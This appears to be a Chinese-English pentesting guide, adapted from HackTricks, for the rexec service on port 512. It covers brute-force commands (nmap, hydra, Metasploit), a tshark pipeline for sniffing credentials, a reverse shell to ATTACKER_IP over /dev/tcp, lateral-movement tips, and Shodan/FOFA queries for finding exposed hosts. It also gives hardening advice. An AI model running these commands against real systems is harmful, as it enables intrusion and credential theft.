--- title: "512 - Rexec" weight: 512 date: "2026-03-10T10:03:28+08:00" lastmod: "2026-03-10T13:26:55+08:00" --- 💡 **学习提示**: 本文档介绍 **512 - rexec** 的渗透测试方法,适合信息安全初学者和从业人员参考。 ⚠️ **法律声明**: 本文档仅供学习和授权测试使用。未经授权的系统测试可能违反法律法规。 --- #### 协议 quick-look 1. 客户端 connects to TCP 512. 2. 客户端 sends three **NUL-terminated** strings: * the port number (as ASCII) where it wishes to receive stdout/stderr (often `0`), * the **username**, * the **password**. 3. A final NUL-terminated string with the **command** to execute is sent. 4. The server replies with a single 8-bit status byte (0 = success, `1` = failure) followed by the command output. That means you can reproduce the exchange with nothing more than `echo -e` and `nc`: ```bash (echo -ne "0\0user\0password\0id\0"; cat) | nc 512 ``` If the credentials are valid you will receive the output of `id` straight back on the same connection. #### Manual usage with the client Many Linux distributions still ship the legacy client inside the **inetutils-rexec** / **rsh-client** package: ```bash rexec -l user -p password "uname -a" ``` If `-p` is omitted the client will prompt interactively for the password (visible on the wire in clear-text!). --- ### 信息收集 & Brute-forcing #### [**Brute-force**](../generic-hacking/brute-force.md#rexec) #### Nmap ```bash nmap -p 512 --script rexec-info ## Discover service banner and test for stdout port mis-configuration nmap -p 512 --script rexec-brute --script-args "userdb=users.txt,passdb=rockyou.txt" ``` The `rexec-brute` NSE uses the protocol described above to try credentials very quickly . #### Hydra / Medusa / Ncrack ```bash hydra -L users.txt -P passwords.txt rexec:// -s 512 -t 8 ``` `hydra` has a dedicated **rexec** module and remains the fastest offline bruteforcer . `medusa` (`-M REXEC`) and `ncrack` (`rexec` module) can be used in the same way. #### Metasploit ``` use auxiliary/scanner/rservices/rexec_login set RHOSTS set USER_FILE users.txt set PASS_FILE passwords.txt run ``` The module will spawn a shell on success and store the credentials in the database . --- ### Sniffing credentials Because everything is clear-text, **network captures are priceless**. With a copy of the traffic you can extract creds without touching the target: ```bash tshark -r traffic.pcap -Y 'tcp.port == 512' -T fields -e data.decoded | \ awk -F"\\0" '{print $2":"$3" -> "$4}' # username:password -> command ``` (In Wireshark enable *Decode As …​* TCP 512 → REXEC to view nicely-parsed fields.) --- ### Post-漏洞利用 tips * Commands run with the privileges of the supplied user. If `/etc/pam.d/rexec` is mis-configured (e.g. `pam_rootok`), root shells are sometimes possible. * Rexec ignores the user’s shell and executes the command via `/bin/sh -c `. You can therefore use typical shell-escape tricks (`;`, ``$( )``, backticks) to chain multiple commands or spawn reverse shells: ```bash rexec -l user -p pass 'bash -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"' ``` * Passwords are often stored in **~/.netrc** on other systems; if you compromise one host you may reuse them for lateral movement. --- ### Hardening / Detection * **Do not expose rexec**; replace it with SSH. Virtually all modern *inetd* superservers comment the service out by default. * If you must keep it, restrict access with TCP wrappers (`/etc/hosts.allow`) or firewall rules and enforce strong per-account passwords. * Monitor for traffic to :512 and for `rexecd` process launches. A single packet capture is enough to detect a compromise. * Disable `rexec`, `rlogin`, `rsh` together – they share most of the same codebase and weaknesses. --- --- ### 搜索引擎语法 #### FOFA ```bash # FOFA 搜索语法 port="512" ``` #### Shodan ```bash # Shodan 搜索语法 port:512 ``` #### ZoomEye ```bash # ZoomEye 搜索语法 port:512 ``` --- ## 📖 参考资料 - [HackTricks - 512-rexec](https://book.hacktricks.wiki/en/network-services-pentesting/512-rexec.html)